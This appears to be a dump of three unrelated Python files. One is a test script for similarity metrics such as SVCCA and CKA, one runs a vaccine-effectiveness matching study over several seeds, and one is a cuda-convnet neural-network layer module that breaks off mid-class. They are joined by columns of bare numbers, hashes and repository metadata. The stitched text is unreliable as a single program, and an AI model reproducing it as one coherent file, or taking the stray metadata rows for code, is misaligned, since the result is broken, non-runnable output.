print(f'Is it close to 0.0? {approx_equal(dist, 0.0)}')
assert(approx_equal(dist, 0.0)), f'dist should be close to 0.0 but got {dist=}'
metric_comparison_type = 'pwcca'
X: torch.Tensor = torch.distributions.Normal(loc=0.0, scale=1.0).sample((B, Din))
dist: float = get_metric(mdl1, mdl2, X, X, layer_name, downsample_size=None, iters=1, metric_comparison_type=metric_comparison_type, metric_as_sim_or_dist=metric_as_sim_or_dist)
print(f'Should be very very close to 0.0: {dist=} ({metric_comparison_type=})')
print(f'Is it close to 0.0? {approx_equal(dist, 0.0)}')
assert(approx_equal(dist, 0.0)), f'dist should be close to 0.0 but got {dist=}'
metric_comparison_type = 'lincka'
X: torch.Tensor = torch.distributions.Normal(loc=0.0, scale=1.0).sample((B, Din))
dist: float = get_metric(mdl1, mdl2, X, X, layer_name, downsample_size=None, iters=1, metric_comparison_type=metric_comparison_type, metric_as_sim_or_dist=metric_as_sim_or_dist)
print(f'Should be very very close to 0.0: {dist=} ({metric_comparison_type=})')
print(f'Is it close to 0.0? {approx_equal(dist, 0.0)}')
assert(approx_equal(dist, 0.0)), f'dist should be close to 0.0 but got {dist=}'
metric_comparison_type = 'opd'
X: torch.Tensor = torch.distributions.Normal(loc=0.0, scale=1.0).sample((B, Din))
dist: float = get_metric(mdl1, mdl2, X, X, layer_name, downsample_size=None, iters=1, metric_comparison_type=metric_comparison_type, metric_as_sim_or_dist=metric_as_sim_or_dist)
print(f'Should be very very close to 0.0: {dist=} ({metric_comparison_type=})')
print(f'Is it close to 0.0? {approx_equal(dist, 0.0, tolerance=1e-2)}')
assert(approx_equal(dist, 0.0, tolerance=1e-2)), f'dist should be close to 0.0 but got {dist=}'
#%%
from copy import deepcopy
import torch
import torch.nn as nn
# import uutils.torch_uu
from uutils.torch_uu import get_metric, approx_equal
from uutils.torch_uu.models import get_named_identity_one_layer_linear_model
print("--- Sanity check: dCCA == 0.0 when using same reference to the same network even though its different input ('BUG' CASE). --")
Din: int = 10
Dout: int = Din
B: int = 2000
mdl1: nn.Module = get_named_identity_one_layer_linear_model(D=Din)
mdl2: nn.Module = mdl1
layer_name = 'fc0'
# - ends up comparing two matrices of size [B, Dout], on same data, on same model
metric_as_sim_or_dist: str = 'dist'
metric_comparison_type = 'svcca'
X1: torch.Tensor = torch.distributions.Normal(loc=0.0, scale=1.0).sample((B, Din))
X2: torch.Tensor = torch.distributions.Normal(loc=0.0, scale=1.0).sample((B, Din))
dist: float = get_metric(mdl1, mdl2, X1, X2, layer_name, downsample_size=None, iters=1, metric_comparison_type=metric_comparison_type, metric_as_sim_or_dist=metric_as_sim_or_dist)
print(f'Should be very very close to 0.0: {dist=} ({metric_comparison_type=})')
print(f'Is it close to 0.0? {approx_equal(dist, 0.0)}')
assert(approx_equal(dist, 0.0)), f'dist should be close to 0.0 but got {dist=}'
metric_comparison_type = 'pwcca'
dist: float = get_metric(mdl1, mdl2, X1, X2, layer_name, downsample_size=None, iters=1, metric_comparison_type=metric_comparison_type, metric_as_sim_or_dist=metric_as_sim_or_dist)
print(f'Should be very very close to 0.0: {dist=} ({metric_comparison_type=})')
print(f'Is it close to 0.0? {approx_equal(dist, 0.0)}')
assert(approx_equal(dist, 0.0)), f'dist should be close to 0.0 but got {dist=}'
metric_comparison_type = 'lincka'
dist: float = get_metric(mdl1, mdl2, X1, X2, layer_name, downsample_size=None, iters=1, metric_comparison_type=metric_comparison_type, metric_as_sim_or_dist=metric_as_sim_or_dist)
print(f'Should be very very close to 0.0: {dist=} ({metric_comparison_type=})')
print(f'Is it close to 0.0? {approx_equal(dist, 0.0)}')
assert(approx_equal(dist, 0.0)), f'dist should be close to 0.0 but got {dist=}'
metric_comparison_type = 'opd'
dist: float = get_metric(mdl1, mdl2, X1, X2, layer_name, downsample_size=None, iters=1, metric_comparison_type=metric_comparison_type, metric_as_sim_or_dist=metric_as_sim_or_dist)
print(f'Should be very very close to 0.0: {dist=} ({metric_comparison_type=})')
print(f'Is it close to 0.0? {approx_equal(dist, 0.0, tolerance=1e-2)}')
assert(approx_equal(dist, 0.0, tolerance=1e-2)), f'dist should be close to 0.0 but got {dist=}'
#%%
from copy import deepcopy
import torch
import torch.nn as nn
# import uutils.torch_uu as torch_uu
from uutils.torch_uu import norm
from uutils.torch_uu import get_metric, approx_equal
from uutils.torch_uu.models import get_named_identity_one_layer_linear_model
print("--- Sanity check: dCCA > 0.0 when using different reference to the same network and using different inputs. --")
Din: int = 10
Dout: int = Din
B: int = 2000
mdl1: nn.Module = get_named_identity_one_layer_linear_model(D=Din)
mdl2: nn.Module = deepcopy(mdl1)
layer_name = 'fc0'
# - ends up comparing two matrices of size [B, Dout], on same data, on same model
metric_as_sim_or_dist: str = 'dist'
X1: torch.Tensor = torch.distributions.Normal(loc=0.0, scale=1.0).sample((B, Din))
X2: torch.Tensor = torch.distributions.Normal(loc=0.0, scale=1.0).sample((B, Din))
metric_comparison_type = 'svcca'
assert (X1.norm() != X2.norm())
assert norm(mdl1) == norm(mdl2), f'Models are the same so they should have the same norm for weights but got: {norm(mdl1), norm(mdl2)}'
dist: float = get_metric(mdl1, mdl2, X1, X2, layer_name, downsample_size=None, iters=1, metric_comparison_type=metric_comparison_type, metric_as_sim_or_dist=metric_as_sim_or_dist)
print(f'{metric_as_sim_or_dist=}')
print(f'Should not be close to 0.0: {dist=} ({metric_comparison_type=})')
print(f'Is it far from 0.0? {not approx_equal(dist, 0.0)} it is: {dist=}')
assert(not approx_equal(dist, 0.0)), f' {dist=}'
metric_comparison_type = 'pwcca'
assert (X1.norm() != X2.norm())
assert norm(mdl1) == norm(mdl2), f'Models are the same so they should have the same norm for weights but got: {norm(mdl1), norm(mdl2)}'
dist: float = get_metric(mdl1, mdl2, X1, X2, layer_name, downsample_size=None, iters=1, metric_comparison_type=metric_comparison_type, metric_as_sim_or_dist=metric_as_sim_or_dist)
print(f'{metric_as_sim_or_dist=}')
print(f'Should not be close to 0.0: {dist=} ({metric_comparison_type=})')
print(f'Is it far from 0.0? {not approx_equal(dist, 0.0)} it is: {dist=}')
assert(not approx_equal(dist, 0.0)), f' {dist=}'
metric_comparison_type = 'lincka'
assert (X1.norm() != X2.norm())
assert norm(mdl1) == norm(mdl2), f'Models are the same so they should have the same norm for weights but got: {norm(mdl1), norm(mdl2)}'
dist: float = get_metric(mdl1, mdl2, X1, X2, layer_name, downsample_size=None, iters=1, metric_comparison_type=metric_comparison_type, metric_as_sim_or_dist=metric_as_sim_or_dist)
print(f'{metric_as_sim_or_dist=}')
print(f'Should not be close to 0.0: {dist=} ({metric_comparison_type=})')
print(f'Is it far from 0.0? {not approx_equal(dist, 0.0)} it is: {dist=}')
assert(not approx_equal(dist, 0.0)), f' {dist=}'
metric_comparison_type = 'opd'
assert (X1.norm() != X2.norm())
assert norm(mdl1) == norm(mdl2), f'Models are the same so they should have the same norm for weights but got: {norm(mdl1), norm(mdl2)}'
dist: float = get_metric(mdl1, mdl2, X1, X2, layer_name, downsample_size=None, iters=1, metric_comparison_type=metric_comparison_type, metric_as_sim_or_dist=metric_as_sim_or_dist)
print(f'{metric_as_sim_or_dist=}')
print(f'Should not be close to 0.0: {dist=} ({metric_comparison_type=})')
print(f'Is it far from 0.0? {not approx_equal(dist, 0.0)} it is: {dist=}')
assert(not approx_equal(dist, 0.0)), f' {dist=}'
#%%
from copy import deepcopy
import torch
import torch.nn as nn
# import uutils.torch_uu as torch_uu
from uutils.torch_uu import norm
from uutils.torch_uu import get_metric, approx_equal
from uutils.torch_uu.models import get_named_identity_one_layer_linear_model
print("--- Sanity check: dCCA > 0.0 when using different reference to the same network and using different inputs. --")
Din: int = 10
Dout: int = Din
B: int = 2000
mdl1: nn.Module = get_named_identity_one_layer_linear_model(D=Din)
mdl2: nn.Module = deepcopy(mdl1)
# mdl2: nn.Module = mdl1
layer_name = 'fc0'
# - ends up comparing two matrices of size [B, Dout], on same data, on same model
metric_as_sim_or_dist: str = 'dist'
X1: torch.Tensor = torch.distributions.Normal(loc=0.0, scale=1.0).sample((B, Din))
X2: torch.Tensor = torch.distributions.Normal(loc=0.0, scale=1.0).sample((B, Din))
metric_comparison_type = 'svcca'
assert (X1.norm() != X2.norm())
assert norm(mdl1) == norm(mdl2), f'Models are the same so they should have the same norm for weights but got: {norm(mdl1), norm(mdl2)}'
dist: float = get_metric(mdl1, mdl2, X1, X2, layer_name, downsample_size=None, iters=1, metric_comparison_type=metric_comparison_type, metric_as_sim_or_dist=metric_as_sim_or_dist)
print(f'{metric_as_sim_or_dist=}')
print(f'Should not be close to 0.0: {dist=} ({metric_comparison_type=})')
print(f'Is it far from 0.0? {not approx_equal(dist, 0.0)} it is: {dist=}')
assert(not approx_equal(dist, 0.0)), f' {dist=}'
metric_comparison_type = 'pwcca'
assert (X1.norm() != X2.norm())
assert norm(mdl1) == norm(mdl2), f'Models are the same so they should have the same norm for weights but got: {norm(mdl1), norm(mdl2)}'
dist: float = get_metric(mdl1, mdl2, X1, X2, layer_name, downsample_size=None, iters=1, metric_comparison_type=metric_comparison_type, metric_as_sim_or_dist=metric_as_sim_or_dist)
print(f'{metric_as_sim_or_dist=}')
print(f'Should not be close to 0.0: {dist=} ({metric_comparison_type=})')
print(f'Is it far from 0.0? {not approx_equal(dist, 0.0)} it is: {dist=}')
assert(not approx_equal(dist, 0.0)), f' {dist=}'
metric_comparison_type = 'lincka'
assert (X1.norm() != X2.norm())
assert norm(mdl1) == norm(mdl2), f'Models are the same so they should have the same norm for weights but got: {norm(mdl1), norm(mdl2)}'
dist: float = get_metric(mdl1, mdl2, X1, X2, layer_name, downsample_size=None, iters=1, metric_comparison_type=metric_comparison_type, metric_as_sim_or_dist=metric_as_sim_or_dist)
print(f'{metric_as_sim_or_dist=}')
print(f'Should not be close to 0.0: {dist=} ({metric_comparison_type=})')
print(f'Is it far from 0.0? {not approx_equal(dist, 0.0)} it is: {dist=}')
assert(not approx_equal(dist, 0.0)), f' {dist=}'
metric_comparison_type = 'opd'
assert (X1.norm() != X2.norm())
assert norm(mdl1) == norm(mdl2), f'Models are the same so they should have the same norm for weights but got: {norm(mdl1), norm(mdl2)}'
dist: float = get_metric(mdl1, mdl2, X1, X2, layer_name, downsample_size=None, iters=1, metric_comparison_type=metric_comparison_type, metric_as_sim_or_dist=metric_as_sim_or_dist)
print(f'{metric_as_sim_or_dist=}')
print(f'Should not be close to 0.0: {dist=} ({metric_comparison_type=})')
print(f'Is it far from 0.0? {not approx_equal(dist, 0.0)} it is: {dist=}')
assert(not approx_equal(dist, 0.0)), f' {dist=}'
| 53.047273
| 179
| 0.750823
| 2,625
| 14,588
| 3.956571
| 0.044571
| 0.020797
| 0.154054
| 0.066339
| 0.982188
| 0.981514
| 0.981514
| 0.981514
| 0.981514
| 0.981514
| 0
| 0.034834
| 0.110502
| 14,588
| 275
| 180
| 53.047273
| 0.765567
| 0.045997
| 0
| 0.985366
| 0
| 0.117073
| 0.332158
| 0.065928
| 0
| 0
| 0
| 0
| 0.17561
| 1
| 0
| false
| 0
| 0.131707
| 0
| 0.131707
| 0.258537
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
296553839382c7576901a851119a42cab535c180
| 5,941
|
py
|
Python
|
scripts/corona_matching_runs.py
|
higorsmonteiro/vaccine-eff-fortaleza
|
ee4465a4b767dab15773b973a19ff900f9f96a66
|
[
"MIT"
] | null | null | null |
scripts/corona_matching_runs.py
|
higorsmonteiro/vaccine-eff-fortaleza
|
ee4465a4b767dab15773b973a19ff900f9f96a66
|
[
"MIT"
] | null | null | null |
scripts/corona_matching_runs.py
|
higorsmonteiro/vaccine-eff-fortaleza
|
ee4465a4b767dab15773b973a19ff900f9f96a66
|
[
"MIT"
] | null | null | null |
import os
os.chdir("..")
# JAN-AUG COHORT
for seed in [6,7,8,9,10]:
print(f"JAN-AUG COHORT -> Seed {seed} CORONAVAC")
# ALLPOP CORONAVAC
os.system(f"python perform_matching.py --start 2021-01-21 --end 2021-08-31 --vaccine CORONAVAC --age_range 60 200 --seed {seed} --hdi_index 1 --pop_test ALL --dose DATA D1 --days_after 0 --suffix NOVO")
os.system(f"python perform_matching.py --start 2021-01-21 --end 2021-08-31 --vaccine CORONAVAC --age_range 60 200 --seed {seed} --hdi_index 1 --pop_test ALL --dose DATA D2 --days_after 0 --suffix NOVO")
os.system(f"python perform_matching.py --start 2021-01-21 --end 2021-08-31 --vaccine CORONAVAC --age_range 60 200 --seed {seed} --hdi_index 1 --pop_test ALL --dose DATA D1 --days_after 7 --suffix NOVO")
os.system(f"python perform_matching.py --start 2021-01-21 --end 2021-08-31 --vaccine CORONAVAC --age_range 60 200 --seed {seed} --hdi_index 1 --pop_test ALL --dose DATA D2 --days_after 7 --suffix NOVO")
os.system(f"python perform_matching.py --start 2021-01-21 --end 2021-08-31 --vaccine CORONAVAC --age_range 60 200 --seed {seed} --hdi_index 1 --pop_test ALL --dose DATA D1 --days_after 14 --suffix NOVO")
os.system(f"python perform_matching.py --start 2021-01-21 --end 2021-08-31 --vaccine CORONAVAC --age_range 60 200 --seed {seed} --hdi_index 1 --pop_test ALL --dose DATA D2 --days_after 14 --suffix NOVO")
#os.system(f"python perform_matching.py --start 2021-01-21 --end 2021-08-31 --vaccine CORONAVAC --age_range 60 200 --seed {seed} --hdi_index 2 --pop_test ALL --dose DATA D1 --days_after 0 --suffix NOVO")
#os.system(f"python perform_matching.py --start 2021-01-21 --end 2021-08-31 --vaccine CORONAVAC --age_range 60 200 --seed {seed} --hdi_index 2 --pop_test ALL --dose DATA D2 --days_after 0 --suffix NOVO")
#os.system(f"python perform_matching.py --start 2021-01-21 --end 2021-08-31 --vaccine CORONAVAC --age_range 60 200 --seed {seed} --hdi_index 2 --pop_test ALL --dose DATA D1 --days_after 7 --suffix NOVO")
#os.system(f"python perform_matching.py --start 2021-01-21 --end 2021-08-31 --vaccine CORONAVAC --age_range 60 200 --seed {seed} --hdi_index 2 --pop_test ALL --dose DATA D2 --days_after 7 --suffix NOVO")
#os.system(f"python perform_matching.py --start 2021-01-21 --end 2021-08-31 --vaccine CORONAVAC --age_range 60 200 --seed {seed} --hdi_index 2 --pop_test ALL --dose DATA D1 --days_after 14 --suffix NOVO")
#os.system(f"python perform_matching.py --start 2021-01-21 --end 2021-08-31 --vaccine CORONAVAC --age_range 60 200 --seed {seed} --hdi_index 2 --pop_test ALL --dose DATA D2 --days_after 14 --suffix NOVO")
#os.system(f"python perform_matching.py --start 2021-01-21 --end 2021-08-31 --vaccine CORONAVAC --age_range 60 200 --seed {seed} --hdi_index 2 --pop_test ALL --suffix PRI_NA_COORTEX")
# VACCINEPOP CORONAVAC
#os.system(f"python perform_matching.py --start 2021-01-21 --end 2021-08-31 --vaccine CORONAVAC --age_range 60 200 --seed {seed} --hdi_index 0 --pop_test VACCINE --suffix VACPOPUL_PRI_NA_COORTE")
#os.system(f"python perform_matching.py --start 2021-01-21 --end 2021-08-31 --vaccine CORONAVAC --age_range 60 200 --seed {seed} --hdi_index 2 --pop_test VACCINE --suffix VACPOPUL_PRI_NA_COORTE")
print(f"JAN-JUN COHORT -> Seed {seed} CORONAVAC")
# ALLPOP CORONAVAC
#os.system(f"python perform_matching.py --start 2021-01-21 --end 2021-06-30 --vaccine CORONAVAC --age_range 60 200 --seed {seed} --hdi_index 0 --pop_test ALL --suffix PRI_NA_COORTEX")
#os.system(f"python perform_matching.py --start 2021-01-21 --end 2021-06-30 --vaccine CORONAVAC --age_range 60 200 --seed {seed} --hdi_index 2 --pop_test ALL --suffix PRI_NA_COORTEX")
# VACCINEPOP CORONAVAC
#os.system(f"python perform_matching.py --start 2021-01-21 --end 2021-06-30 --vaccine CORONAVAC --age_range 60 200 --seed {seed} --hdi_index 0 --pop_test VACCINE --suffix VACPOPUL_PRI_NA_COORTE")
#os.system(f"python perform_matching.py --start 2021-01-21 --end 2021-06-30 --vaccine CORONAVAC --age_range 60 200 --seed {seed} --hdi_index 2 --pop_test VACCINE --suffix VACPOPUL_PRI_NA_COORTE")
#print(f"JAN-AUG COHORT -> Seed {seed} ASTRAZENECA")
## ALLPOP ASTRAZENECA
#os.system(f"python perform_matching.py --start 2021-01-21 --end 2021-08-31 --vaccine ASTRAZENECA --age_range 18 200 --seed {seed} --hdi_index 0 --pop_test ALL --suffix PRI_NA_COORTE")
#os.system(f"python perform_matching.py --start 2021-01-21 --end 2021-08-31 --vaccine ASTRAZENECA --age_range 18 200 --seed {seed} --hdi_index 2 --pop_test ALL --suffix PRI_NA_COORTE")
## VACCINEPOP ASTRAZENECA
#os.system(f"python perform_matching.py --start 2021-01-21 --end 2021-08-31 --vaccine ASTRAZENECA --age_range 18 200 --seed {seed} --hdi_index 0 --pop_test VACCINE --suffix VACPOPUL_PRI_NA_COORTE")
#os.system(f"python perform_matching.py --start 2021-01-21 --end 2021-08-31 --vaccine ASTRAZENECA --age_range 18 200 --seed {seed} --hdi_index 2 --pop_test VACCINE --suffix VACPOPUL_PRI_NA_COORTE")
#print(f"JAN-JUN COHORT -> Seed {seed} ASTRAZENECA")
## ALLPOP ASTRAZENECA
#os.system(f"python perform_matching.py --start 2021-01-21 --end 2021-06-30 --vaccine ASTRAZENECA --age_range 18 200 --seed {seed} --hdi_index 0 --pop_test ALL --suffix PRI_NA_COORTE")
#os.system(f"python perform_matching.py --start 2021-01-21 --end 2021-06-30 --vaccine ASTRAZENECA --age_range 18 200 --seed {seed} --hdi_index 2 --pop_test ALL --suffix PRI_NA_COORTE")
## VACCINEPOP ASTRAZENECA
#os.system(f"python perform_matching.py --start 2021-01-21 --end 2021-06-30 --vaccine ASTRAZENECA --age_range 18 200 --seed {seed} --hdi_index 0 --pop_test VACCINE --suffix VACPOPUL_PRI_NA_COORTE")
#os.system(f"python perform_matching.py --start 2021-01-21 --end 2021-06-30 --vaccine ASTRAZENECA --age_range 18 200 --seed {seed} --hdi_index 2 --pop_test VACCINE --suffix VACPOPUL_PRI_NA_COORTE")
| 112.09434
| 208
| 0.714694
| 1,010
| 5,941
| 4.047525
| 0.062376
| 0.060665
| 0.059442
| 0.09907
| 0.989726
| 0.989726
| 0.989726
| 0.984344
| 0.984344
| 0.984344
| 0
| 0.12225
| 0.135331
| 5,941
| 52
| 209
| 114.25
| 0.673545
| 0.72917
| 0
| 0
| 0
| 0.545455
| 0.76972
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.090909
| 0
| 0.090909
| 0.181818
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
4696ab556bb7ba19291153e3efd4cb4dc9663a6a
| 26,809
|
py
|
Python
|
anna/layers/cc_layers.py
|
gitter-badger/anna
|
9ea433812f6376df0190074c06bb7f4f785c6d5d
|
[
"BSD-2-Clause"
] | 64
|
2015-01-13T22:31:47.000Z
|
2020-03-31T05:29:39.000Z
|
anna/layers/cc_layers.py
|
gitter-badger/anna
|
9ea433812f6376df0190074c06bb7f4f785c6d5d
|
[
"BSD-2-Clause"
] | 2
|
2015-11-06T02:58:16.000Z
|
2019-11-28T07:57:35.000Z
|
anna/layers/cc_layers.py
|
gitter-badger/anna
|
9ea433812f6376df0190074c06bb7f4f785c6d5d
|
[
"BSD-2-Clause"
] | 26
|
2015-03-23T10:22:46.000Z
|
2021-09-26T08:48:24.000Z
|
"""
Layers using the cuda-convnet Theano wrappers that are part of pylearn2.
"""
import theano
import theano.tensor as T
import numpy
from pylearn2.sandbox.cuda_convnet.filter_acts import FilterActs
from pylearn2.sandbox.cuda_convnet.img_acts import ImageActs
from pylearn2.sandbox.cuda_convnet.pool import MaxPool, MaxPoolGrad
from pylearn2.sandbox.cuda_convnet.stochastic_pool import StochasticMaxPool
from pylearn2.sandbox.cuda_convnet.stochastic_pool import WeightedMaxPool
from pylearn2.sandbox.cuda_convnet.response_norm import CrossMapNorm
from theano.sandbox.cuda.basic_ops import gpu_contiguous
from theano.sandbox.cuda import host_from_gpu
from theano.tensor import as_tensor_variable
import layers
# TODO(tpaine) refactor the convolution layers to get rid of code repetition.
class Input2DLayer(layers.Input2DLayer):
def __init__(self, mb_size, n_features, width, height):
self.mb_size = mb_size
self.n_features = n_features
self.width = width
self.height = height
self.input_var = T.tensor4('input')
self.data_order = layers.data_order.type2
def get_output_shape(self):
# c01b instead of bc01
return (self.n_features, self.width, self.height, self.mb_size)
def output(self, *args, **kwargs):
return self.input_var
class DropoutLayer(object):
def __init__(self,
input_layer,
dropout=0.):
self.input_layer = input_layer
self.input_shape = self.input_layer.get_output_shape()
self.mb_size = self.input_layer.mb_size
self.n_features = self.input_layer.n_features
self.width = self.input_layer.width
self.height = self.input_layer.height
self.dropout = dropout
self.params = []
self.bias_params = []
self.trainable = False
self.data_order = layers.data_order.type2
assert (len(self.input_layer.get_output_shape()) == 4), \
'Input must have 4 dimensions.'
assert (self.input_layer.data_order == self.data_order), \
'Input data order does not match this layer\'s data order.'
def get_output_shape(self):
return self.input_shape
def output(self, input=None, dropout_active=True, *args, **kwargs):
if input is None:
input = self.input_layer.output(dropout_active=dropout_active,
*args, **kwargs)
if dropout_active and (self.dropout > 0.):
retain_prob = 1 - self.dropout
mask = layers.srng.binomial(input.shape, p=retain_prob,
dtype='int32').astype('float32')
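# Inverted dropout (editor's note): dividing by retain_prob here keeps
# the expected activation unchanged, so the weights need no rescaling at
# test time.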
input = input / retain_prob * mask
output = input
return output
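# Minimal composition sketch (editor's addition, hypothetical sizes): layers
# chain via their input_layer argument, e.g.
#   inp = Input2DLayer(mb_size=128, n_features=3, width=32, height=32)
#   drop = DropoutLayer(inp, dropout=0.5)
# and drop.output() pulls the expression through the chain in c01b order.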
class Conv2DLayer(object):
def __init__(self,
input_layer,
n_filters,
filter_size,
weights_std,
init_bias_value,
stride=1,
nonlinearity=layers.rectify,
dropout=0.,
partial_sum=None,
pad=0,
untie_biases=False,
trainable=True):
"""
Only the valid border mode is supported.
n_filters should be a multiple of 16
"""
self.input_layer = input_layer
self.input_shape = self.input_layer.get_output_shape()
self.n_filters = n_filters
n_channels = self.input_shape[0]
self.n_channels = n_channels
self.filter_size = filter_size
self.weights_std = numpy.float32(weights_std)
self.init_bias_value = numpy.float32(init_bias_value)
self.stride = stride
self.nonlinearity = nonlinearity
self.dropout = dropout
self.partial_sum = partial_sum
self.pad = pad
self.untie_biases = untie_biases
# if untie_biases == True, each position in the output map has its own
# bias (as opposed to having the same bias everywhere for a given
# filter)
self.mb_size = self.input_layer.mb_size
self.filter_shape = (n_channels, filter_size, filter_size, n_filters)
self.trainable = trainable
self.W = layers.shared_single(4)
if self.untie_biases:
self.b = layers.shared_single(3)
else:
self.b = layers.shared_single(1)
self.params = [self.W, self.b]
self.bias_params = [self.b]
self.data_order = layers.data_order.type2
assert (len(self.input_layer.get_output_shape()) == 4), \
'Input must have 4 dimensions.'
assert (self.input_layer.data_order == self.data_order), \
'Input data order does not match this layer\'s data order.'
self.reset_params()
self.filter_acts_op = FilterActs(stride=self.stride,
partial_sum=self.partial_sum,
pad=self.pad)
def reset_params(self):
self.W.set_value(numpy.random.randn(*self.filter_shape).astype(
numpy.float32) * self.weights_std)
if self.untie_biases:
self.b.set_value(
numpy.ones(self.get_output_shape()[:3]).astype(numpy.float32)
* self.init_bias_value)
else:
self.b.set_value(numpy.ones(self.n_filters).astype(numpy.float32)
* self.init_bias_value)
def get_output_shape(self):
output_width = int(numpy.ceil((
self.input_shape[1] + 2 * self.pad - self.filter_size
+ self.stride)*1.0 / self.stride))
output_height = int(numpy.ceil((
self.input_shape[2] + 2 * self.pad - self.filter_size
+ self.stride)*1.0 / self.stride))
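# Worked example (editor's note): a 32x32 input with pad=0, filter_size=5
# and stride=1 gives ceil((32 + 0 - 5 + 1) / 1) = 28 for each spatial dim.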
output_shape = (self.n_filters, output_width, output_height,
self.mb_size)
return output_shape
def output(self, input=None, dropout_active=True, *args, **kwargs):
if input is None:
input = self.input_layer.output(dropout_active=dropout_active,
*args, **kwargs)
if dropout_active and (self.dropout > 0.):
retain_prob = 1 - self.dropout
mask = layers.srng.binomial(input.shape, p=retain_prob,
dtype='int32').astype('float32')
# apply the input mask and rescale the input accordingly.
# By doing this it's no longer necessary to rescale the weights
# at test time.
input = input / retain_prob * mask
contiguous_input = gpu_contiguous(input)
contiguous_filters = gpu_contiguous(self.W)
conved = self.filter_acts_op(contiguous_input, contiguous_filters)
if self.untie_biases:
conved += self.b.dimshuffle(0, 1, 2, 'x')
else:
conved += self.b.dimshuffle(0, 'x', 'x', 'x')
return self.nonlinearity(conved)
class Conv2DNoBiasLayer(object):
def __init__(self,
input_layer,
n_filters,
filter_size,
weights_std,
stride=1,
nonlinearity=layers.rectify,
dropout=0.,
partial_sum=None,
pad=0,
trainable=True):
"""
Only the valid border mode is supported.
n_filters should be a multiple of 16
"""
self.input_layer = input_layer
self.input_shape = self.input_layer.get_output_shape()
self.n_filters = n_filters
n_channels = self.input_shape[0]
self.n_channels = n_channels
self.filter_size = filter_size
self.weights_std = numpy.float32(weights_std)
self.stride = stride
self.nonlinearity = nonlinearity
self.dropout = dropout
self.partial_sum = partial_sum
self.pad = pad
self.mb_size = self.input_layer.mb_size
self.data_order = layers.data_order.type2
assert (len(self.input_layer.get_output_shape()) == 4), \
'Input must have 4 dimensions.'
assert (self.input_layer.data_order == self.data_order), \
'Input data order does not match this layer\'s data order.'
self.filter_shape = (n_channels, filter_size, filter_size, n_filters)
self.trainable = trainable
self.W = layers.shared_single(4)
self.params = [self.W]
self.reset_params()
self.filter_acts_op = FilterActs(stride=self.stride,
partial_sum=self.partial_sum,
pad=self.pad)
def reset_params(self):
self.W.set_value(numpy.random.randn(*self.filter_shape).astype(
numpy.float32) * self.weights_std)
def get_output_shape(self):
output_width = int(numpy.ceil((
self.input_shape[1] + 2 * self.pad - self.filter_size
+ self.stride)*1.0 / self.stride))
output_height = int(numpy.ceil((
self.input_shape[2] + 2 * self.pad - self.filter_size
+ self.stride)*1.0 / self.stride))
output_shape = (self.n_filters, output_width, output_height,
self.mb_size)
return output_shape
def output(self, input=None, dropout_active=True, *args, **kwargs):
if input is None:
input = self.input_layer.output(dropout_active=dropout_active,
*args, **kwargs)
if dropout_active and (self.dropout > 0.):
retain_prob = 1 - self.dropout
mask = layers.srng.binomial(input.shape, p=retain_prob,
dtype='int32').astype('float32')
# apply the input mask and rescale the input accordingly.
# By doing this it's no longer necessary to rescale the weights
# at test time.
input = input / retain_prob * mask
contiguous_input = gpu_contiguous(input)
contiguous_filters = gpu_contiguous(self.W)
conved = self.filter_acts_op(contiguous_input, contiguous_filters)
return self.nonlinearity(conved)
class Deconv2DLayer(object):
def __init__(self,
input_layer,
mirror_layer,
nonlinearity=None):
"""
Only the valid border mode is supported.
n_filters should be a multiple of 16
"""
self.mirror_layer = mirror_layer
self.input_layer = input_layer
self.input_shape = self.input_layer.get_output_shape()
n_filters = self.input_shape[0]
if nonlinearity:
self.nonlinearity = nonlinearity
else:
self.nonlinearity = mirror_layer.nonlinearity
self.n_channels = mirror_layer.n_channels
self.n_filters = mirror_layer.n_filters
self.filter_size = mirror_layer.filter_size
self.weights_std = mirror_layer.weights_std
self.init_bias_value = mirror_layer.init_bias_value
self.stride = mirror_layer.stride
self.dropout = mirror_layer.dropout
self.partial_sum = mirror_layer.partial_sum
self.pad = mirror_layer.pad
self.untie_biases = mirror_layer.untie_biases
# if untie_biases == True, each position in the output map has its own
# bias (as opposed to having the same bias everywhere for a filter)
self.mb_size = self.input_layer.mb_size
self.filter_shape = mirror_layer.filter_shape
self.trainable = False
self.W = mirror_layer.W
self.b = mirror_layer.b
# self.params = [self.W, self.b]
self.params = []
self.bias_params = [self.b]
self.data_order = layers.data_order.type2
assert (len(self.input_layer.get_output_shape()) == 4), \
'Input must have 4 dimensions.'
assert (self.input_layer.data_order == self.data_order), \
'Input data order does not match this layer\'s data order.'
self.image_acts_op = ImageActs(stride=self.stride,
partial_sum=self.partial_sum,
pad=self.pad)
def get_output_shape(self):
output_shape = self.mirror_layer.input_layer.get_output_shape()
return output_shape
def output(self, input=None, dropout_active=True, *args, **kwargs):
if input is None:
input = self.input_layer.output(dropout_active=dropout_active,
*args, **kwargs)
if self.untie_biases:
input -= self.b.dimshuffle(0, 1, 2, 'x')
else:
input -= self.b.dimshuffle(0, 'x', 'x', 'x')
if dropout_active and (self.dropout > 0.):
retain_prob = 1 - self.dropout
mask = layers.srng.binomial(input.shape, p=retain_prob,
dtype='int32').astype('float32')
# apply the input mask and rescale the input accordingly.
# By doing this it's no longer necessary to rescale the weights
# at test time.
input = input / retain_prob * mask
contiguous_input = gpu_contiguous(input)
contiguous_filters = gpu_contiguous(self.W)
if self.stride == 1:
deconved = self.image_acts_op(contiguous_input, contiguous_filters)
else:
_, x, y, _ = self.get_output_shape()
deconved = self.image_acts_op(contiguous_input, contiguous_filters,
as_tensor_variable((x, y)))
return self.nonlinearity(deconved)
class DeconvUntied2DLayer(object):
def __init__(self,
input_layer,
mirror_layer,
nonlinearity=None):
"""
Only the valid border mode is supported.
n_filters should be a multiple of 16
"""
self.mirror_layer = mirror_layer
self.input_layer = input_layer
self.input_shape = self.input_layer.get_output_shape()
n_filters = self.input_shape[0]
if nonlinearity:
self.nonlinearity = nonlinearity
else:
